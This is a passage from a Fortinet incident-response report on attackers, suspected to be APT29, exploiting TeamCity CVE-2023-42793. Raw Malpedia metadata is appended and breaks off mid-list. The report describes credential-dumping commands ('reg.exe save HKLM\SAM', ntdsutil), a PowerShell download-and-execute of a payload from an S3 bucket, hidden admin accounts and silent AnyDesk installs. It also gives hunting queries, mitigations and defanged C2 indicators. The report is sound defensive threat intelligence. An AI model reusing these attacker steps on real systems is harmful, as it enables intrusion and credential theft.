/drive/root:/Apps/quent-application\r\nKey Value\r\n@odata.context https://graph[.]microsoft[.]com/v1.0/$metadata#users('girmisdrong%40outlook.com')/drive/root/$entity\r\nname excerpt2002VI\r\nwebUrl https://1drv[.]ms/f/s!AALb1YPGQLqThmw\r\ndisplayName GrimiApplication\r\ndriveId 93ba40c683d5db02\r\ndriveType personal\r\nid 93BA40C683D5DB02!103\r\nfolder name GrimiApplication\r\npath /drive/root:/Apps/GrimiApplication\r\nThe analyst team also observed numerous anti-debugging techniques in malicious DLL files, such as a call to\r\nNtQueryObject to look for the “DebugObject” variable. It also has strings such as “Ollydbg,” probably to check if the\r\nOllydbg.exe process is running. If the process is found running, the malware may then terminate itself.\r\nGiven our understanding of the main threat actor’s operations, we determined that persistence was still possible. The IR\r\nteam provided recommendations on removing existing adversary accesses and persistence. A high-level view of the\r\ncontainment and eradication actions recommended are provided below:\r\n1. Blocking the IP addresses used by threat actors\r\n2. Removing TeamCity software accounts created by threat actors\r\n3. Removing Windows accounts created by threat actors\r\n4. Removing backdoors created by threat actors\r\n5. Removing malicious files dropped by threat actors\r\nAfter implementing these containment and remediation actions by the victim security team, no further malicious activity has\r\nbeen observed.\r\nOther Threat Actor Activity\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 19 of 31\n\nIn addition to the main threat actor, there were other threat actors who exploited the TeamCity vulnerability. One of these\r\nthreat actors used their RCE access through the exploit to create a new TeamCity user via the TeamCity API. They then\r\nadded the ‘System administrator’ role to this newly created user account. No evidence was found to indicate that this newly\r\ncreated account was ever used once it was created. Logs related to this activity were recorded in the teamcity-server.log and\r\ncan be seen in Figure 21.\r\nFigure 21: TeamCity log showing the creation of a new user and assigning an admin role to the user.\r\nAnother threat actor separately attempted to download and execute an executable from an Amazon S3 bucket. Using an\r\nAmazon S3 Bucket instead of a separate C2 for file downloads differs from the actions of the main threat actor. This is\r\nsignificant, as many organizations include Amazon Services URLs in their allowlist. The threat actor used the\r\n‘DownloadFile’ method of the PowerShell ‘WebClient’ class to download the Amazon-hosted payload. The file was saved as\r\n‘1.exe’ in the path ‘C:\\Windows\\Temp\\1.exe’. After downloading this file, the threat actor attempted to execute it using the\r\ncommand ‘cmd.exe /c C:\\Windows\\Temp\\1.exe’. Windows Defender logs indicate this file was detected as\r\nTrojan:Script/Phonzy.B!ml malware by Windows Defender shortly after download and was deleted before it could be\r\nexecuted. Associated log events within the teamcity-server.log linked to this download activity are shown in Figure 22.\r\nFigure 22: TeamCity log showing download and execution of 1.exe by the threat actor.\r\nAnother threat actor used their TeamCity exploit to download and execute the installer for legitimate remote access software\r\nAnyDesk on the HOST_1_TEAMCITY. The AnyDesk software was installed with the ‘--start-with-win' parameter, making\r\nit auto-start on boot. The ‘--silent’ parameter was also used, which prevents the AnyDesk application from showing any\r\nmessages or errors during execution. The threat actor then set a password to AnyDesk and executed it with the ‘--get-id'\r\nparameter to retrieve the AnyDesk-ID. This ID is used to connect to an instance of AnyDesk. This software is an\r\nimplementation of a command-and-control technique (T1219[22]) and also supports persistence as the threat actor can use\r\nthe AnyDesk-ID to connect to a running instance of the software. Log events associated with these activities in the teamcity-server.log snippet are shown in Figure 23.\r\nFigure 23: The TeamCity log showing the installation and execution of the Anydesk remote access tool.\r\nThe Fortinet IR team was able to link connections made from the host HOST_1_TEAMCITY from the AnyDesk application\r\nto IP address 92.38.177[.]14. When we investigated, it was found to be an AnyDesk software relay address. Using relays as\r\npart of AnyDesk infrastructure allows threat actors to abstract their own infrastructure from intrusions. FortiGuard CTS\r\ninformation for the relay IP is shown in Figure 24. It’s worth noting that FortiGuard CTS marked this as clean because\r\nAnyDesk is a common remote management tool that, by default, uses AnyDesk infrastructure, which is not malicious by\r\nitself.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 20 of 31\n\nFigure 24: Fortiguard CTS screen with information about AnyDesk relay IP address.\r\nThe connections made by AnyDesk.exe can be seen in Figure 25.\r\nFigure 25: An Anydesk.exe TCP/IP connection from host HOST_1_TEAMCITY to the internet.\r\nThese actors tried one or two methods but did not conduct further activity on the server or victim network. They likely\r\nlacked the knowledge or interest to pursue further intrusion on the victim network, as their initial efforts were ineffective.\r\nConclusion\r\nThis article provided details of several intrusions where the TeamCity vulnerability CVE-2023-42793 was exploited to gain\r\naccess to the victim network. Observed exploitation originated from multiple disparate threat actors who employed\r\nnumerous diverse post-exploitation techniques in an attempt to gain a foothold in the victim network. It should be noted that\r\nthis activity occurred after the vendor (JetBrains) had provided a valid patch.\r\nWhile the security controls in place within the victim's environment were able to keep the majority of adversaries at bay, a\r\nfailure to adequately triage alerts generated by the victim's EDR (FortiEDR) and subsequent downgrading of protections\r\nopened gaps in the victim's defenses. This allowed the main threat actor to establish a foothold and eventually gain the\r\naccess required to maneuver freely through the network.\r\nAs part of this intrusion, the main threat actor employed the GraphicalProton malware to maintain access. The main threat\r\nactor primarily used Scheduled Tasks (T1053.005[23]) to execute these GraphicalProton payloads. Their preferred method\r\nof defense evasion for these scheduled tasks was rundll32 proxy execution, but the threat actor was also able to employ\r\nseveral legitimate third-party binaries that were vulnerable to search order hijacking to execute their malware. Given the\r\ntechnique crossover with previously reported activity and the identification of the GraphicalProton payload, FortiGuard\r\nbelieves with medium confidence that this attack was part of a new BlueBravo (tracked by Recorded Future[24])/APT29\r\n(tracked by Mandiant[25]) campaign. Of particular note are the significant OPSEC considerations employed throughout the\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 21 of 31\n\nintrusion (discounting the opendir web server fumble): the use of compromised infrastructure local to the victim, search\r\norder hijacking with legitimate DLLs added after execution, the quality of masquerading, and the use of single-use\r\ninfrastructure components.\r\nMITRE ATT\u0026CK mappings, mitigation suggestions, and threat-hunting queries are provided below to assist organizations\r\nin identifying similar activity in their environments. IOCs have also been provided for completeness.\r\nFortinet Protections\r\nThe malware described in this report are detected and blocked by FortiGuard Antivirus as:\r\nAntiVirus: W64/GraphicalProton.A!tr\r\nAntiVirus: W64/Dukes.O!tr\r\nAntiVirus: W32/Dukes.P!tr\r\nAntiVirus: W32/PossibleThreat\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard AntiVirus engine\r\nis a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nFortinet has also released an IPS signature to proactively protect our customers from the threats contained in the report:\r\nCVE-2023-42793: JetBrains.TeamCity.CVE-2023-42793.Authentication.Bypass\r\nThe URLs are rated as “Malicious Websites” and “Malicious Activities Found” by the FortiGuard Web Filtering service.\r\nFortiGuard IP Reputation and Anti-Botnet Security Service proactively block these attacks by aggregating malicious source\r\nIP data from the Fortinet distributed network of threat sensors, CERTs, MITRE, cooperative competitors, and other global\r\nsources that collaborate to provide up-to-date threat intelligence about hostile sources.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global FortiGuard\r\nIncident Response Team.\r\nThreat Hunting\r\nThe following Threat Hunting query will search for a network socket connected by rundll32.exe, which has the same\r\nfilenames of DLL as those observed in this intrusion.\r\nType: (\"Socket Connect\") AND Source.Process.Name: (\"rundll32.exe\") AND Source.Process.CommandLine:\r\n(\"\\\"AclNumsInvertHost.dll\\\", AclNumsInvertHost\" OR \"\\\"UnregisterAncestorAppendAuto.dll\\\",\r\nUnregisterAncestorAppendAuto\")\r\nThe following Threat Hunting query will search for process creation events where rundll32.exe launches cmd.exe and\r\nexecutes any of the commands executed by the malicious DLL upon execution.\r\nType: (\"Process Creation\") AND Source.Process.Name: (\"rundll32.exe\") AND Target.Process.File.Name: (\"cmd.exe\") AND\r\nTarget.Process.CommandLine: (\"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 netstat \\-afn \\-p TCP\\\"\" OR \"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 wmic\r\ndatafile where Name\\=\\\"C\\:\\\\\\\\Windows\\\\\\\\system32\\\\\\\\ntoskrnl.exe\\\" get Version\\\"\" OR \"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 echo\r\n%userdomain%\\*%computername%\\*\\*%username%\\\"\" OR \"\\/C \\\"chcp 65001 \\\u003e NUL \u0026 tasklist\\\"\")\r\nThe following Threat Hunting query will search for process creation of scheduled tasks using schtasks.exe with type\r\nONLOGON or ONSTART and with the following filenames (iisexpresstray.exe, AclNumsInvertHost.dll,\r\nUnregisterAncestorAppendAuto.dll), which were used throughout this intrusion for persistence.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 22 of 31\n\nType: (\"Process Creation\") AND Target.Process.File.Name: (\"schtasks.exe\") AND Target.Process.CommandLine: (create\r\n\\/SC AND (ONLOGON OR ONSTART)) AND Target.Process.CommandLine:(iisexpresstray.exe OR\r\nAclNumsInvertHost.dll OR UnregisterAncestorAppendAuto.dll OR DefenderUPDService OR IISUpdateService)\r\nThe following Threat Hunting query will search for an event where a particular task creation was being verified by the threat\r\nactor.\r\nType: (\"Process Creation\") AND Target.Process.File.Name: (\"schtasks.exe\") AND Target.Process.CommandLine: (\"\\/Query\r\n\\/TN \\\\Microsoft\\\\Windows\\\\DefenderUPDService \\/FO LIST \\/V\")\r\nThe following Threat Hunting query will search for an event where TeamCity process (java.exe) creates a process of\r\nWindows task management utility (schtasks.exe). Keep in mind that this query might have false positives where there is an\r\nofficial need for Java applications to launch the schedule task utility.\r\nType: (\"Process Creation\") AND Source.Process.Name: (\"java.exe\") AND Target.Process.File.Name: (\"schtasks.exe\")\r\nThe following Threat Hunting query will search for an event where schtasks.exe is the target process and the command line\r\ncontains rundll32.exe. Keep in mind this query might generate false positives in envrionments where there are scheduled\r\ntasks having rundll32.exe are created using schtasks.exe.\r\nType: (\"Process Creation\") AND target.Process.Name: (\"schtasks.exe\") AND Target.Process.CommandLine: (rundll32.exe)\r\nThe following Threat Hunting query will search for an event where rundll32.exe will connect to login.microsoftonline[.]com\r\nor graph.microsoft[.]com over HTTP protocol. Keep in mind that this query might generate false positives where there is a\r\nlegitimate use of rundll32.exe to connect to these URLs.\r\nType: (\"HTTP Request\") AND Source.Process.Name: (\"rundll32.exe\") AND URL:\r\n(\"https\\:\\/\\/login.microsoftonline.com\\:443\" OR \"https\\:\\/\\/graph.microsoft.com\\:443\")\r\nMITRE ATT\u0026CK\r\nTA0042: Resource Development\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1584.004\r\nCompromise\r\nInfrastructure:\r\nServer\r\nThe threat actor(s) had compromised a server of an educational institution. A\r\nmalicious DLL file connected to this compromised server as a C2. The IR team\r\nsuspects that this server acts as a connection forwarder to the real C2.\r\nMitigation\r\nMitigation is difficult using preventive controls as infrastructure is outside the scope of the enterprise.\r\nFortinet Security Fabric Controls:\r\nN/A\r\nTA0043: Reconnaissance\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 23 of 31\n\nTechnique Technique Description Observed Activity\r\nT1595.002\r\nActive Scanning:\r\nVulnerability Scanning\r\nThe threat actor(s) performed vulnerability scans using Nuclei to check if\r\nthe TeamCity server was vulnerable for CVE-2023-42793.\r\nMitigation\r\nTraffic pattern inspection for the specific URL pattern used in a vulnerability check can be done. Also,\r\nmonitoring of network data for uncommon data flows can be done to identify abnormal activity.\r\nFortinet Security Fabric Controls:\r\nFortiGate, FortiSIEM\r\nTA0001: Initial Access\r\nTechnique Technique Description Observed Activity\r\nT1190\r\nExploit Public-Facing\r\nApplication\r\nThe threat actor(s) exploited the vulnerability CVE-2023-42793 of the\r\npublic-facing TeamCity software host.\r\nMitigation\r\nWeb Application Firewalls may be used to limit exposure of applications to prevent exploit traffic from\r\nreaching the application.\r\nSegment externally facing servers and services from the rest of the network with a DMZ or on separate\r\nhosting infrastructure.\r\nFortinet Security Fabric Controls:\r\nFortiWeb, FortiGate, FortiSIEM\r\nTA0002: Execution\r\nTechnique Technique Description Observed Activity\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows Command\r\nShell\r\nThe threat actor(s) executed cmd.exe through the vulnerable\r\nTeamCity software for various activities, including the download and\r\nexecution of malicious files.\r\nMitigation Blocking network connections from cmd.exe to external IP addresses, except for those on an allow list, is\r\nthe best way to limit this very prevalent TTP.\r\nDetection of cmd.exe being spawned by software services (e.g. java.exe in current scenario).\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 24 of 31\n\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiGate, FortiSIEM (detection)\r\nTechnique Technique Description Observed Activity\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nThe threat actor(s) used Windows Task Scheduler to create scheduled tasks\r\nto execute dropped payloads and maintain persistence.\r\nMitigation\r\nAudit the scheduled task on the hosts using a SIEM tool to identify abnormal tasks. \r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection), FortiEDR, FortiClient\r\nTechnique Technique Description Observed Activity\r\nT1047\r\nWindows Management\r\nInstrumentation\r\nThe threat actor(s) used the Windows Management Instrumentation\r\ncommand-line utility from HOST_1_TEAMCITY to connect to multiple\r\nother hosts for lateral movement.\r\nMitigation\r\nUse application control to block execution of wmic.exe if it is not required for a given system or network.\r\nThis ensures that potential misuse is prevented.\r\nAdvanced EDR products with behavioral detection can detect and block the use of WMIC for malicious\r\nbehaviors.\r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection), FortiEDR, FortiClient\r\nTA0003: Persistence\r\nTechnique Technique Description Observed Activity\r\nT1136.001\r\nCreate Account: Local\r\nAccount\r\nThe threat actor(s) created a Windows local administrator account\r\nthrough cmd.exe.\r\nMitigation\r\nNew account creation should be audited using Windows logs.\r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection)\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 25 of 31\n\nTechnique Technique Description Observed Activity\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nThe threat actor(s) used Windows Task Scheduler to create scheduled tasks\r\nto execute dropped payloads and maintain persistence.\r\nMitigation\r\nAudit the scheduled task on the hosts using SIEM tool for abnormal tasks. \r\nFortinet Security Fabric Controls:\r\nFortiSIEM (detection)\r\nTA0005: Defense Evasion\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1574.001\r\nHijack Execution\r\nFlow: DLL Search\r\nOrder Hijacking\r\nThreat actor(s) downloaded a number of legitimate signed executable files and\r\nmalicious DLLs in the same folder. The malicious DLLs were named similarly\r\nbut were different from their legitimate counterparts. A full list of vulnerable\r\nlegitimate software used in this way is available in Table 2 in the report.\r\nMitigation\r\nEnable Safe DLL Search Mode to force search for system DLLs in directories with greater restrictions.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient\r\nTechnique\r\nTechnique\r\nDescription\r\nObserved Activity\r\nT1564.002\r\nHide\r\nArtifacts:\r\nHidden\r\nUsers\r\nThreat actor(s) created a new local admin account and made that account a special\r\naccount by adding HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\r\nNT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist to the registry path. This\r\nprevented the new account from being displayed on the GUI login screen.\r\nMitigation\r\nMonitor executed commands and arguments that could be used to add a new user and subsequently hide it\r\nfrom login screens. Advanced EDR solutions like FortiEDR can be used to monitor for associated registry\r\nchanges. Windows advanced logs can be ingested into SIEM to monitor these activities.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, Windows Advanced Logging, FortiSIEM, FortiSOAR\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 26 of 31\n\nTechnique Technique Description Observed Activity\r\nT1027.002\r\nObfuscated Files or Information: Software\r\nPacking\r\nMalicious DLL files were obfuscated to avoid\r\nanalysis.\r\nMitigation\r\nEmploy heuristic-based malware detection on endpoints and generate alerts for executables packed with\r\nknown packers.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient\r\nTechnique Technique Description Observed Activity\r\nT1218.011\r\nSystem Binary Proxy\r\nExecution: Rundll32\r\nThe actor(s) used the Windows utility rundll32.exe to execute malicious DLL\r\nfiles (GraphicalProton). This appeared to be the adversary’s primary/preferred\r\nmethod of DLL execution.\r\nMitigation\r\nA behavioral detection tool such as FortiEDR can be used to detect and block malicious activities\r\nperformed by files executed via rundll32.exe.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient, FortiSIEM, FortiSOAR\r\nTA0006: Credential Access\r\nTechnique Technique Description Observed Activity\r\nT1003.002\r\nOS Credential Dumping: Security\r\nAccount Manager\r\nThe threat actor had tried to dump SAM using the command\r\n‘reg.exe save HKLM\\SAM.’\r\nMitigation\r\nA modern EDR solution should detect and mitigate attempts to access and dump the SAM registry hive.\r\nFortinet Security Fabric Controls:\r\nFortiEDR\r\nTechnique Technique Description Observed Activity\r\nT1003.003\r\nOS Credential Dumping:\r\nNTDS\r\nThe threat actor had tried to dump Ntds.dit using the Windows utility\r\nntdsutil.exe.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 27 of 31\n\nMitigation\r\nA modern EDR solution should detect and mitigate attempts to access and dump NTDS files.\r\nFortinet Security Fabric Controls:\r\nFortiEDR\r\nTA0011: Command \u0026 Control\r\nTechnique Technique Description Observed Activity\r\nT1071.001\r\nApplication Layer Protocol: Web\r\nProtocols\r\nThe malicious DLL file made HTTPS web requests to the\r\nadversary’s C2.\r\nMitigation\r\nNetwork intrusion detection and prevention systems that use network signatures to identify traffic for\r\nspecific adversary malware can be used to mitigate activity at the network level.\r\nFirewalls should be able to block network connections with anomalous user-agent strings associated with\r\nnon-standard browsers. This can also reduce the effectiveness of this TTP if the adversary does not\r\nconfigure a user-agent to match the environment. It is possible to block C2 IPs/URLs obtained from a\r\nthreat intel feed at the gateway level.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiGate, FortiSIEM, FortiGuard Threat Intelligence\r\nTechnique Technique Description Observed Activity\r\nT1219\r\nRemote Access\r\nSoftware\r\nThe actor downloaded AnyDesk software as an alternative C2 method to gain\r\ndirect remote access to victim endpoints.\r\nMitigation\r\nApplication whitelisting is a great way of reducing the effectiveness of this TTP. Where this is not\r\nachievable, a modern EDR solution should be able to flag remote access software and other PUPs as\r\nsuspicious so they can be allowed explicitly if used legitimately in an environment. A network-level IDS\r\n(Intrusion Detection System) with the ability to detect AnyDesk software traffic would be able to block\r\nthis traffic.\r\nFortinet Security Fabric Controls:\r\nFortiEDR, FortiClient, FortiNDR, FortiAnalyzer, FortiSIEM, FortiSOAR\r\nTechnique Technique Description Observed Activity\r\nT1090.003 Proxy: Multi-hop Proxy The actor used the Tor network to launch exploit attacks.\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 28 of 31\n\nMitigation\r\nTraffic to known anonymity networks and C2 infrastructures can be blocked through the use of network\r\nallow and block lists. Firewalls with deep inspection (e.g. FortiGate[26]) can block Tor traffic through\r\nApplication Control.\r\nFortinet Security Fabric Controls:\r\nFortiGate, FortiEDR, FortiClient\r\nIOCs\r\nThe following IOCs are from the investigation, analysis of the samples, and subsequent activity observed on the same host\r\nbetween initial detection and remediation by the customer. In addition to these IOCs directly observed by the FortiGuard IR\r\nteam, several samples that match the characteristics of observed samples have been included to assist with detecting\r\nhistorical activity.\r\nIndicator\r\nIndicator\r\nType\r\nAssociated\r\nTactic\r\nNotes\r\na66d76d86448965e57d7be96a57529c497e4b99d\r\nSHA1\r\nHash\r\nExecution File hash of 1.exe downloaded on\r\nhost\r\nd4411f70e0dcc2f88d74ae7251d51c6676075f6f\r\nFile hash of malicious DLL\r\nAclNumsInvertHost.dll\r\nf836173805a8c4d4ee319fdefe4a5e92f3f55f32\r\nFile hash of malicious DLL\r\nUnregisterAncestorAppendAuto.d\r\na4b03f1e981ccdd7e08e786c72283d5551671edf\r\nFile hash of malicious DLL\r\nModeBitmapNumericAnimate.dll\r\n8f5780056107dbc2bb59d63f454d8523091ddde2\r\nFile hash of malicious DLL\r\nMpCmdHelp.dll\r\n51aa6e5186ede77545e99b14b8f7e8180a0c6933\r\nFile hash of malicious DLL\r\noleac.dll\r\n4fed3d5de4df20d961831be6194b9d595b943bc9\r\nFile hash of malicious DLL\r\nPerformanceCaptionApi.dll\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 29 of 31\n\n682b9ac9448707024985ad54476acfbf642a03b9\r\nFile hash of malicious DLL\r\npdhui_1.dll\r\n3a32e516c037c37f7bf83171e167511ba53870a7\r\nFile hash of malicious DLL\r\nwinmm.dll\r\n2df317b8a408d2ad5c94b9de6f20bbef03e46066\r\nFile hash of malicious DLL\r\nmscorees.dll\r\nhxxp://bringthenoiseappnew.s3.amazonaws[.]com/ujwphtigdcokr\r\nURL C2\r\nC2 URL from which malicious\r\nexecutable downloaded\r\nhXXp[:]//103[.]76[.]128[.]34:8080/\r\nC2 URL from which malicious\r\nDLLs downloaded\r\nhXXps[:]//fisheries-states-codes-camps[.]trycloudflare[.]com/rcu\r\nC2 URL from which malicious\r\nexecutable downloaded\r\n128[.]199[.]207[.]131\r\nIP C2\r\nC2 IP address seen from\r\nGraphicalProton malware\r\n167[.]114[.]3[.]69\r\nArticle References\r\n[1] https://nvd.nist.gov/vuln/detail/CVE-2023-42793\r\n[2] https://www.sonarsource.com/blog/teamcity-vulnerability/\r\n[3] https://www.jetbrains.com/teamcity/\r\n[4] https://attackerkb.com/topics/1XEEEkGHzt/cve-2023-42793/rapid7-analysis\r\n[5] https://www.cisa.gov/news-events/alerts/2023/10/04/cisa-adds-two-known-exploited-vulnerabilities-catalog-removes-five-kevs\r\n[6] https://github.com/projectdiscovery/nuclei\r\n[7] https://github.com/projectdiscovery/nuclei-templates/blob/016d696c4c964f47580f21a1219f6c878264a7a0/http/cves/2023/CVE-2023-42793.yaml#L52C34-L52C34\r\n[8] https://crt.sh/?q=d88fbe100874149e0059203fc1873958cde569deae66e1d934083006a4d5a258\r\n[9] https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing\r\n[10] https://www.wired.com/story/the-untold-story-of-solarwinds-the-boldest-supply-chain-hack-ever/\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 30 of 31\n\n[11] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf\r\n[12] https://learn.microsoft.com/en-us/iis/extensions/introduction-to-iis-express/iis-express-overview\r\n[13] https://attack.mitre.org/techniques/T1036/005/\r\n[14] https://attack.mitre.org/techniques/T1574/001/\r\n[15] https://pubs.opengroup.org/onlinepubs/009604599/functions/opendir.html\r\n[16] https://attack.mitre.org/techniques/T1003/002/\r\n[17] https://attack.mitre.org/techniques/T1003/002/\r\n[18] https://attack.mitre.org/techniques/T1136/001/\r\n[19] https://attack.mitre.org/techniques/T1047/\r\n[20] https://github.com/ParrotSec/mimikatz\r\n[21] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf\r\n[22] https://attack.mitre.org/techniques/T1219\r\n[23] https://attack.mitre.org/techniques/T1053/005\r\n[24] https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf\r\n[25] https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing\r\n[26] https://community.fortinet.com/t5/FortiGate/Technical-Tip-Blocking-and-monitoring-Tor-traffic/ta-p/196239\r\nSource: https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nhttps://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793\r\nPage 31 of 31", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793" ], "report_names": [ "teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793" ], "threat_actors": [ { "id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d", "created_at": "2022-10-25T16:07:24.139848Z", "updated_at": "2026-04-10T02:00:04.878798Z", "deleted_at": null, "main_name": "Safe", "aliases": [], "source_name": "ETDA:Safe", "tools": [ "DebugView", "LZ77", "OpenDoc", "SafeDisk", "TypeConfig", "UPXShell", "UsbDoc", "UsbExe" ], "source_id": "ETDA", "reports": null }, { "id": "5b748f86-ac32-4715-be9f-6cf25ae48a4e", "created_at": "2024-06-04T02:03:07.956135Z", "updated_at": "2026-04-10T02:00:03.689959Z", "deleted_at": null, "main_name": "IRON HEMLOCK", "aliases": [ "APT29 ", "ATK7 ", "Blue Kitsune ", "Cozy Bear ", "The Dukes", "UNC2452 ", "YTTRIUM " ], "source_name": "Secureworks:IRON HEMLOCK", "tools": [ "CosmicDuke", "CozyCar", "CozyDuke", "DiefenDuke", "FatDuke", "HAMMERTOSS", "LiteDuke", "MiniDuke", "OnionDuke", "PolyglotDuke", "RegDuke", "RegDuke Loader", "SeaDuke", "Sliver" ], "source_id": "Secureworks", "reports": null }, { "id": "a241a1ca-2bc9-450b-a07b-aae747ee2710", "created_at": "2024-06-19T02:03:08.150052Z", "updated_at": "2026-04-10T02:00:03.737173Z", "deleted_at": null, "main_name": "IRON RITUAL", "aliases": [ "APT29", "Blue Dev 5 ", "BlueBravo ", "Cloaked Ursa ", "CozyLarch ", "Dark Halo ", "Midnight Blizzard ", "NOBELIUM ", "StellarParticle ", "UNC2452 " ], "source_name": "Secureworks:IRON RITUAL", "tools": [ "Brute Ratel C4", "Cobalt Strike", "EnvyScout", "GoldFinder", "GoldMax", "NativeZone", "RAINDROP", "SUNBURST", "Sibot", "TEARDROP", "VaporRage" ], "source_id": "Secureworks", "reports": null }, { "id": "46b3c0fc-fa0c-4d63-a38a-b33a524561fb", "created_at": "2023-01-06T13:46:38.393409Z", "updated_at": "2026-04-10T02:00:02.955738Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "Cloaked Ursa", "TA421", "Blue Kitsune", "BlueBravo", "IRON HEMLOCK", "G0016", "Nobelium", "Group 100", "YTTRIUM", "Grizzly Steppe", "ATK7", "ITG11", "COZY BEAR", "The Dukes", "Minidionis", "UAC-0029", "SeaDuke" ], "source_name": "MISPGALAXY:APT29", "tools": [ "SNOWYAMBER", "HALFRIG", "QUARTERRIG" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "20d3a08a-3b97-4b2f-90b8-92a89089a57a", "created_at": "2022-10-25T15:50:23.548494Z", "updated_at": "2026-04-10T02:00:05.292748Z", "deleted_at": null, "main_name": "APT29", "aliases": [ "APT29", "IRON RITUAL", "IRON HEMLOCK", "NobleBaron", "Dark Halo", "NOBELIUM", "UNC2452", "YTTRIUM", "The Dukes", "Cozy Bear", "CozyDuke", "SolarStorm", "Blue Kitsune", "UNC3524", "Midnight Blizzard" ], "source_name": "MITRE:APT29", "tools": [ "PinchDuke", "ROADTools", "WellMail", "CozyCar", "Mimikatz", "Tasklist", "OnionDuke", "FatDuke", "POSHSPY", "EnvyScout", "SoreFang", "GeminiDuke", "reGeorg", "GoldMax", "FoggyWeb", "SDelete", "PolyglotDuke", "AADInternals", "MiniDuke", "SeaDuke", "Sibot", "RegDuke", "CloudDuke", "GoldFinder", "AdFind", "PsExec", "NativeZone", "Systeminfo", "ipconfig", "Impacket", "Cobalt Strike", "PowerDuke", "QUIETEXIT", "HAMMERTOSS", "BoomBox", "CosmicDuke", "WellMess", "VaporRage", "LiteDuke" ], "source_id": "MITRE", "reports": null }, { "id": "f27790ff-4ee0-40a5-9c84-2b523a9d3270", "created_at": "2022-10-25T16:07:23.341684Z", "updated_at": "2026-04-10T02:00:04.549917Z", "deleted_at": null, "main_name": "APT 29", "aliases": [ "APT 29", "ATK 7", "Blue Dev 5", "BlueBravo", "Cloaked Ursa", "CloudLook", "Cozy Bear", "Dark Halo", "Earth Koshchei", "G0016", "Grizzly Steppe", "Group 100", "ITG11", "Iron Hemlock", "Iron Ritual", "Midnight Blizzard", "Minidionis", "Nobelium", "NobleBaron", "Operation Ghost", "Operation Office monkeys", "Operation StellarParticle", "SilverFish", "Solar Phoenix", "SolarStorm", "StellarParticle", "TEMP.Monkeys", "The Dukes", "UNC2452", "UNC3524", "Yttrium" ], "source_name": "ETDA:APT 29", "tools": [ "7-Zip", "ATI-Agent", "AdFind", "Agentemis", "AtNow", "BEATDROP", "BotgenStudios", "CEELOADER", "Cloud Duke", "CloudDuke", "CloudLook", "Cobalt Strike", "CobaltStrike", "CosmicDuke", "Cozer", "CozyBear", "CozyCar", "CozyDuke", "Danfuan", "EnvyScout", "EuroAPT", "FatDuke", "FoggyWeb", "GeminiDuke", "Geppei", "GoldFinder", "GoldMax", "GraphDrop", "GraphicalNeutrino", "GraphicalProton", "HAMMERTOSS", "HammerDuke", "LOLBAS", "LOLBins", "LiteDuke", "Living off the Land", "MagicWeb", "Mimikatz", "MiniDionis", "MiniDuke", "NemesisGemina", "NetDuke", "OnionDuke", "POSHSPY", "PinchDuke", "PolyglotDuke", "PowerDuke", "QUIETEXIT", "ROOTSAW", "RegDuke", "Rubeus", "SNOWYAMBER", "SPICYBEAT", "SUNSHUTTLE", 